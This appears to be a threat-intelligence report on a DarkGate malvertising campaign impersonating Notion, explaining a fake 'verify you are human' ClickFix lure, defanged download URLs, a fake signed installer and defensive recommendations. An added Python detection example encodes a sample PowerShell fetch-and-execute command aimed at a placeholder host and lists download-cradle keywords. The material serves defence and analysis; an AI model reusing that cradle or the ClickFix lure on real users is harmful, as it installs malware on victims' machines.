# Threat Actor Using ClickFix and Phishing Attacks in the Latest DarkGate Campaign

## Summary

Cyble Research and Intelligence Labs (CRIL) came across an article in which a security researcher discovered a ClickFix social engineering attack delivered via malicious Google ads, alongside a conventional phishing-page attack, both delivering DarkGate malware.

In a recent malvertising campaign impersonating the Notion brand, the two aforementioned techniques were observed in use. The threat actors were likely collecting metrics to determine which method resulted in the highest malware installation conversion rates.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281788702/e4b3a340-4700-4ba3-aaa2-4ea77927d13f.png align="center")

## Campaign Details

### PowerShell code via “ClickFix”

Threat actors launched a Google ad impersonating the popular utility application Notion. On our first click, the ad redirected us to a site displaying a "Verify you are human" page, resembling Cloudflare Turnstile. However, this was not a legitimate Cloudflare service but rather a social engineering ploy.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281883296/45d25144-5c2a-440a-8c64-3eeb99abca18.png align="center")

The HTML source code was obfuscated, appearing as gibberish interspersed with Russian comments. Upon further analysis, we identified it as Rot13, a letter substitution cipher. This was likely employed to conceal the malicious code from detection by security analysts and network defenses.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281911745/9e609245-e634-4a5f-9719-6e9f80539c8a.png align="center")

After checking the box to verify our humanity, a new set of instructions titled “Verification steps” appeared, requiring specific key combinations. Pressing **Windows + R** opened the Run dialog, while **Ctrl + V** pasted a predefined code from the clipboard. Supposedly part of the verification process, this sequence instead tricked the victim into executing a malicious command upon pressing **Enter**.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281937114/ab860d63-58e6-427d-9c7a-f238b7ffbeb8.png align="center")

The clipboard content is a command-line instruction designed to execute PowerShell.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281960185/e21c7333-916c-4628-a69f-13aafde15dfe.png align="center")

The Base64-encoded string fetches the following code from hxxps\[:\]//s2notion\[.\]com/in.php?action=1:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281991186/03d4feb2-dc5a-4b00-9995-fbd852b78a38.png align="center")

This retrieves a binary from hxxps\[:\]//s2notion\[.\]com/in.php?action=2 and executes it. The file contains an AutoIt script that runs using the following command:

```
"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739282033902/50c8fafe-10cc-409c-942d-f650e1d64a4d.png align="center")
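The ClickFix chain described above leaves a characteristic trace in process-creation telemetry: the Run dialog makes explorer.exe the parent of a powershell.exe launched with an encoded command that contains a download cradle, and the second stage is the AutoIt interpreter running a .a3x script out of a temp directory. The detection logic below is an added example, not code from the original article or from Cyble; the events, the encoded command and the download URL are constructed for illustration.

```python
import base64
import re

def _encode_ps(cmd: str) -> str:
    """PowerShell's -EncodedCommand expects Base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style (Event ID 1) process-creation events; example.invalid
# is a placeholder standing in for the campaign's download host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc " + _encode_ps(
         "iex (iwr 'https://example.invalid/in.php?action=1' -UseBasicParsing)")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\temp\test\Autoit3.exe",
     "CommandLine": r'"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x'},
    {"ParentImage": r"C:\Program Files\Git\cmd\git.exe",          # benign control
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
]

DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(ev: dict):
    parent, image, cmd = ev["ParentImage"].lower(), ev["Image"].lower(), ev["CommandLine"]
    # Stage 1: Win+R, Ctrl+V, Enter -> explorer.exe spawns powershell.exe with a cradle
    if parent.endswith("\\explorer.exe") and image.endswith("\\powershell.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded and DOWNLOAD_CRADLE.search(decoded):
            return "clickfix_run_dialog_powershell"
    # Stage 2: AutoIt interpreter executing a compiled .a3x script from a temp path
    if image.endswith("autoit3.exe") and re.search(r"\\temp\\.*\.a3x\b", cmd, re.I):
        return "autoit_a3x_from_temp"
    return None

def scan(events):
    """Return (index, verdict) pairs for every event that matches a stage."""
    verdicts = [(i, classify_event(ev)) for i, ev in enumerate(events)]
    return [(i, v) for i, v in verdicts if v]
```

Decoding the Base64 before matching matters: the cradle keywords are invisible in the raw command line, so a rule that only inspects the literal string will miss this stage.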

### Malicious ad and decoy site

When we revisited the malicious ad, its URL path included “/download/”.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739282072107/cf548c21-7ffe-4ed8-8e2b-cd7f28f5cbd2.png align="center")

This follows the more traditional malvertising approach for software downloads, where victims are deceived by a lookalike site before downloading an executable. The file was found hosted on GitHub under the user profile herawtisabela1992.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739282096378/ad57e3f8-a29e-4a7d-a59f-5e5be007c666.png align="center")

This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Like the other binary mentioned in the first delivery technique, it extracts an AutoIt payload using the same DarkGate configuration.

Notably, the same GitHub user account was previously linked to the distribution of a backdoor called Warmcookie (also known as Badspace), which was hosted at:

raw\[.\]githubusercontent\[.\]com/herawtisabela1992/check/refs/heads/main/920836164\_x64.exe

## Recommendations

The following essential cybersecurity best practices form the first line of control against attackers. We recommend that our readers follow them:

● Ensure that robust security software is in place on all devices to detect and block malicious activities, including malware downloads and execution.

● Regularly train employees or users on how to spot phishing attempts, malicious ads, and suspicious pop-ups. Make them aware of common tactics such as fake "human verification" prompts and download scams.

● Always verify the source of software before downloading. Do not download software from untrusted sources and use official websites or trusted repositories only. If in doubt, check digital signatures and hashes.

● Leverage web filtering tools to block access to known malicious sites or suspicious URLs. This can help prevent users from visiting dangerous sites unknowingly.

● Where possible, enable MFA on accounts to add an extra layer of security. Even if an attacker successfully compromises a machine, MFA can prevent unauthorized access to sensitive systems.

● Limit the types of files that can be executed on your network, especially scripts such as PowerShell, AutoIt, and others that are commonly used in these types of attacks.

● Implement continuous monitoring to detect unusual activity, such as suspicious file downloads or the execution of unknown scripts, and regularly audit network traffic for signs of malicious behavior.

## Conclusion

While the ClickFix social engineering attack wasn’t surprising, what made this campaign interesting was its alternation between ClickFix and the standard file download method.

The Threat Actor is likely tracking statistics and comparing which delivery method leads to the most successful installs. If we had to make a prediction, we would wager that ClickFix is currently outperforming. The file download method remains effective, particularly when the payload is digitally signed, but it may soon take a backseat to ClickFix.
